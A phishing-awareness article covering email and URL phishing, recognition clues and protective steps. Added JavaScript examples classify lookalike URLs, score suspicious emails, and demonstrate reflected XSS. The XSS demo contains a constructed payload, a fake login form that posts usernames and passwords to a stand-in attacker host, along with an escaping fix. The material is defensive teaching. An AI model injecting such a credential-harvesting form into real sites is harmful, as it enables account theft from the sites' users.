What is Phishing?
Phishing is a form of Internet fraud aimed at obtaining confidential data: logins and passwords, credit card numbers, email account details and so on. The phisher's goal is to steal personal data or to get malware installed on the victim's device.
Phishing is one of the most common types of cyber attack, and everyone should learn to recognize it in order to protect themselves from fraud.
There are two main types of phishing attacks:
- Email phishing – suspicious emails may contain fake requests for help, messages from "your bank" or another payment system, notifications that you have won a lottery you never entered, and so on. The email carries the link or attachment that leads to the actual theft.
- URL phishing – the address of a real site is replaced with a lookalike. The top-level domain may be swapped (.org instead of .com, .gov, etc.); letters in the name may be changed, dropped or transposed so that the fake relies on users mistyping or misreading the original name; Latin letters may be replaced with visually identical characters from other alphabets (homoglyphs); or the real name may be placed at the start of a longer address so that a quick glance reads only the familiar part. In every case the aim is to make the fake link look like a genuine link of the real organization.
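The lookalike tricks above can be checked mechanically. The following JavaScript is an added example for this article, not code from SimpleSwap or from any real filter: it parses a link with the standard URL API, reduces the hostname to its registrable domain and compares it with a short allowlist of sites the user actually uses. The allowlist entry examplebank.com, the sample links and the two-character edit-distance threshold are assumptions made for the demo.

```javascript
// Added example (not from the original article): classify a URL against a
// short allowlist of domains the user trusts, flagging the lookalike tricks
// described above. The allowlist and sample URLs are constructed for the demo.

// Domains the user actually uses. simpleswap.io is the exchange named in the
// article; examplebank.com is a constructed placeholder.
const TRUSTED = ["examplebank.com", "simpleswap.io"];

// Last two labels of a hostname. Good enough for .com/.io here; a real
// implementation would consult the Public Suffix List (assumption) so that
// names like bank.co.uk are handled correctly.
function registrableDomain(hostname) {
  return hostname.split(".").filter(Boolean).slice(-2).join(".");
}

// Edit distance, used to catch one- or two-character typosquats.
function levenshtein(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      dp[i][j] = Math.min(dp[i - 1][j] + 1, dp[i][j - 1] + 1, dp[i - 1][j - 1] + cost);
    }
  }
  return dp[a.length][b.length];
}

function classifyUrl(raw, trusted = TRUSTED) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return { verdict: "invalid", host: null };
  }
  // The WHATWG URL parser has already converted any non-ASCII hostname to its
  // ASCII (punycode, "xn--") form, which is what we inspect below.
  const host = url.hostname.toLowerCase();
  const domain = registrableDomain(host);
  const [name, tld] = domain.split(".");

  if (trusted.includes(domain)) return { verdict: "trusted", host };

  // Homoglyph attack: Latin letters swapped for look-alikes from another script.
  if (host.split(".").some((label) => label.startsWith("xn--"))) {
    return { verdict: "homoglyph", host };
  }

  for (const t of trusted) {
    const [tName, tTld] = t.split(".");
    // examplebank.com.verify-account.example: the trusted name is only a prefix.
    if (host.startsWith(t + ".") || host.includes("." + t + ".")) {
      return { verdict: "subdomain-spoof", host, lookalike: t };
    }
    // examplebank.org instead of examplebank.com
    if (name === tName && tld !== tTld) return { verdict: "tld-swap", host, lookalike: t };
    // examp1ebank.com: a character or two changed
    if (name !== tName && levenshtein(name, tName) <= 2) {
      return { verdict: "typosquat", host, lookalike: t };
    }
    // secure-examplebank-login.com: the brand name buried in a longer name
    if (name.includes(tName)) return { verdict: "brand-embedded", host, lookalike: t };
  }
  return { verdict: "unknown", host };
}

// Constructed sample links.
const SAMPLES = [
  "https://online.examplebank.com/login",
  "https://examplebank.org/login",
  "https://examp1ebank.com/login",
  "https://examplebank.com.verify-account.example/login",
  "https://secure-examplebank-login.com/",
  "https://ex\u0430mplebank.com/", // \u0430 is Cyrillic "а"; the parser turns the label into xn--...
  "not a url",
];
for (const s of SAMPLES) console.log(s, "=>", classifyUrl(s));
```

Run it with node; each sample prints its verdict. The registrableDomain helper takes the last two labels, which is wrong for suffixes like co.uk, so a production version should use the Public Suffix List. The parser normalises an internationalised hostname to its xn-- form, which is exactly why a Cyrillic letter hidden in an otherwise Latin name becomes something the code can inspect.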
According to the 2019 Verizon Data Breach Investigations Report, nearly a third of all breaches in the past year involved phishing, and for cyber-espionage incidents the share rises to 78%. The worst phishing news of 2019 is that attackers are getting much better at what they do, thanks to well-produced off-the-shelf phishing kits and templates.
In the past cybercriminals often relied on misspelled or spoofed domain names and crude copies of the original pages. Today attackers use more sophisticated methods, so fake pages look very similar to the original ones.
An attacker can also exploit a vulnerability in the scripts of the genuine site. With cross-site scripting (XSS), attacker-controlled script or markup is injected into a page that the legitimate domain itself serves, so the victim types a login into what really is the official website's address. This is the most dangerous variant: the usual advice to check the address bar does not help, and such an attack is very difficult to detect without special skills.
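To see why this variant defeats the "look at the address bar" advice, here is a constructed example, added for this article and not code from any real site: a search page that echoes its q parameter back into the HTML, shown once unescaped and once hardened. The payload, the site examplebank.com and the host collect.attacker.example are assumptions for the demo.

```javascript
// Added example (not from the original article): why an XSS flaw on the
// genuine site defeats "check the address bar". Both render functions build a
// search results page from a user-supplied query; only the second escapes it.
// The payload and the host collect.attacker.example are constructed for the demo.

function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the query from ?q=... is concatenated straight into the page,
// so any markup or script it contains becomes part of the genuine site's DOM.
function renderVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Hardened: the same page with the query HTML-escaped before it is embedded.
function renderHardened(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Builds the lure: a link to the REAL site whose query string carries the payload.
function lureLink(searchPageUrl, payload) {
  const u = new URL(searchPageUrl);
  u.searchParams.set("q", payload);
  return u.toString();
}

// What a phisher would inject: a fake "session expired" login form posting to
// the attacker's server. Constructed for the demo.
const PAYLOAD =
  '<form action="https://collect.attacker.example/login" method="post">' +
  "Session expired, please log in again: " +
  '<input name="user"><input name="pass" type="password"><button>Log in</button></form>';

// True if the rendered page contains a live (unescaped) form posting to the attacker.
function containsLiveForm(html) {
  return /<form\s[^>]*action="https:\/\/collect\.attacker\.example/i.test(html);
}

// Demo: the victim clicks a link to the genuine domain; the server echoes ?q= back.
const link = lureLink("https://examplebank.com/search", PAYLOAD);
const echoedQuery = new URL(link).searchParams.get("q"); // what the server receives as ?q=
console.log("address bar shows:", new URL(link).hostname); // examplebank.com, the genuine site
console.log("vulnerable page contains attacker form:", containsLiveForm(renderVulnerable(echoedQuery)));
console.log("hardened page contains attacker form:", containsLiveForm(renderHardened(echoedQuery)));
console.log(renderHardened(echoedQuery));
```

The lure is a link to the genuine domain; only the query string carries the payload, so hovering over it or reading the address bar shows the real site. Modern template engines escape by default, so the real fix is never to build HTML by string concatenation from untrusted input, with a Content Security Policy (its form-action and script-src directives) as a second layer that blocks form submissions and scripts to unexpected origins.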
How to recognize phishing?
Unfortunately, it's not always easy, but there are some clues that can help you recognize a phishing attack:
- The sender is someone you know by name but do not normally correspond with. A familiar name on an unexpected message is no guarantee: attackers spoof real names and send from compromised accounts, so treat such a message as suspicious.
- Don't rush, and be careful with emails marked as urgent. Stay calm and rational when the text tries to create an atmosphere of emergency; an order to follow a link "before your account is blocked" is a classic pressure tactic. Remember that responsible organizations never ask customers to confirm passwords, PINs or full card details by email or through a link they sent.
- Don't trust links or attachments in unsolicited emails. Attachments may contain malware, including ransomware. If there is a link, hover over it first and compare the real target with the text shown. A padlock or an address beginning with "https" only means that the connection to that site is encrypted (TLS, still often called SSL); certificates are free and easy to obtain, so a phishing site can have a perfectly valid one. HTTPS tells you nothing about who runs the site.
- Requests for personal information are a favourite tool of cybercriminals, while banks, financial institutions and online services avoid asking for such data by email.
- Pay attention to the grammar and writing style of the message. Official emails are usually proofread and rarely contain mistakes, though a well-written email is no proof of legitimacy.
- Beware of offers that look too good to be true: notifications that you have won a lottery, an expensive prize or some unique item.
- Use spam filters. Filters generally assess the origin of the message, the software used to send it, and the content and appearance of the message to decide whether it is spam. They occasionally block mail from legitimate sources and occasionally let phishing through, so they are not 100% accurate.
- If you suspect that an email was sent by a scammer, enter the sender's name or a distinctive phrase from the message into Google; reports of phishing campaigns using the same text are often already online.
- Be careful with charity appeals related to worldwide disasters. Scammers often set up fraudulent charities to profit from people who want to help. Don't give your card number unless you are 100% sure the organization is genuine.
- If you often use crypto exchanges (for example, SimpleSwap), we strongly recommend bookmarking the genuine site and always opening it from the bookmark rather than from search results or links, so that you never land on a phishing copy.
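Several of the clues in this list can be turned into a simple triage score. The JavaScript below is an added example, not from the original article or from any real mail filter: it checks a message for urgency language, requests for credentials, a display name that claims a brand while the sending address belongs to another domain, and links whose visible text names one site while the href points to another, which is what hovering over the link would reveal. The two messages, the brand list (Example Bank / examplebank.com) and the weights are constructed for the demo.

```javascript
// Added example (not from the original article): a small triage scorer that
// applies several of the clues above to an email. The messages, brand list and
// weights are constructed for the demo.

// Hostname a URL points to, or null if the string is not a parseable URL.
function hostOf(text) {
  try {
    return new URL(text.trim()).hostname.toLowerCase();
  } catch {
    return null;
  }
}

// Visible link text that a reader would take for an address, e.g.
// "www.examplebank.com/login" (with or without a scheme).
function looksLikeUrl(text) {
  return /^(https?:\/\/)?[\w-]+(\.[\w-]+)+(\/\S*)?$/i.test(text);
}

// Extract (href, visible text) pairs. A regex is enough for the constructed
// HTML here; real mail should go through a proper HTML parser.
function extractLinks(html) {
  const links = [];
  const re = /<a\s[^>]*href\s*=\s*"([^"]*)"[^>]*>([\s\S]*?)<\/a>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    links.push({ href: m[1], text: m[2].replace(/<[^>]+>/g, "").trim() });
  }
  return links;
}

const URGENCY = [/urgent/i, /immediately/i, /within 24 hours/i, /will be (blocked|suspended|closed)/i];
const CREDENTIAL_ASK = [/confirm your (password|pin|card)/i, /verify your (account|identity)/i, /enter your (password|credentials)/i];

// brandDomains maps a brand name as it appears in a display name to the
// domain that brand really sends from, e.g. { "Example Bank": "examplebank.com" }.
function scoreEmail(mail, brandDomains) {
  const reasons = [];
  let score = 0;
  const body = mail.subject + " " + mail.html.replace(/<[^>]+>/g, " ");

  // Clue: pressure and deadlines.
  if (URGENCY.some((re) => re.test(body))) {
    score += 2;
    reasons.push("urgency language");
  }
  // Clue: asks for credentials or card data.
  if (CREDENTIAL_ASK.some((re) => re.test(body))) {
    score += 3;
    reasons.push("asks for credentials");
  }
  // Clue: display name claims a brand, but the address after @ is not the brand's domain.
  const at = mail.from.match(/@([^>\s]+)/);
  const fromDomain = at ? at[1].toLowerCase() : null;
  for (const [brand, domain] of Object.entries(brandDomains)) {
    const claimsBrand = mail.from.toLowerCase().includes(brand.toLowerCase());
    const genuine = fromDomain === domain || (fromDomain !== null && fromDomain.endsWith("." + domain));
    if (claimsBrand && fromDomain && !genuine) {
      score += 3;
      reasons.push(`display name says ${brand} but sender domain is ${fromDomain}`);
    }
  }
  // Clue: link text names one site while the href goes to another (what hovering reveals).
  for (const { href, text } of extractLinks(mail.html)) {
    if (!looksLikeUrl(text)) continue;
    const shown = hostOf(/^https?:\/\//i.test(text) ? text : "https://" + text);
    const real = hostOf(href);
    if (shown && real && shown !== real) {
      score += 4;
      reasons.push(`link text shows ${shown} but target is ${real}`);
    }
  }
  return { score, reasons, verdict: score >= 5 ? "likely phishing" : "probably fine" };
}

// Constructed sample messages.
const PHISH = {
  from: "Example Bank Support <alerts@examplebank-secure.example>",
  subject: "URGENT: your account will be blocked",
  html:
    "<p>We detected unusual activity. Please verify your account within 24 hours.</p>" +
    '<p><a href="https://examplebank.com.verify-account.example/login">www.examplebank.com/login</a></p>',
};
const LEGIT = {
  from: "Example Bank <alerts@notify.examplebank.com>",
  subject: "Your monthly statement is ready",
  html:
    "<p>Your statement for March is available in online banking.</p>" +
    '<p><a href="https://online.examplebank.com/statements">online.examplebank.com</a></p>',
};
const BRANDS = { "Example Bank": "examplebank.com" };

for (const mail of [PHISH, LEGIT]) console.log(mail.subject, "=>", scoreEmail(mail, BRANDS));
```

The scorer deliberately ignores signals a real filter relies on, such as SPF and DKIM results or sender reputation, and the weights are arbitrary; the point is that each clue in the list above is a concrete, checkable property of the message rather than a vague feeling.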
How to avoid URL phishing:
- Always check the URL if you aren't sure about a website's reliability.
- It is also useful to look at the organization's official social media pages before using its services; the genuine web address should be listed there.
- Do not click suspicious search results.
- Do not install risky plugins and browser extensions.
- Do not follow links from suspicious emails and messages.
- Do not use third-party, unofficial applications, which may have been created by scammers.
How to protect your devices from phishing?
Phishing is dangerous and can occur on any device: desktop computer, laptop, tablet or smartphone. To reduce the chance of falling for a phishing site, take the following actions:
- Check your accounts regularly. Even if you are sure nobody is trying to steal your credentials, review your bank and other online accounts for suspicious activity.
- Protect your computer with security software, and keep automatic updates turned on so that it recognizes the newest phishing tricks.
- Protect your mobile phone with an anti-virus app and use its fingerprint or other biometric lock.
- Enable two-factor authentication for all important apps and accounts. A stolen password is then not enough on its own to log in. Keep in mind that codes sent by SMS or generated by an app can still be relayed by a phishing site in real time, so where it is offered, a hardware security key is the stronger choice.
- Always back up your data, and make sure the backups are not permanently connected to your home network or computer, so that ransomware cannot reach them too.
The easiest way to stay safe is always to be careful and never share confidential information unless you are sure that you are dealing with a genuine site or service.
We hope this article will help you avoid phishing sites. Share this information with your friends so that they are also protected from fraud.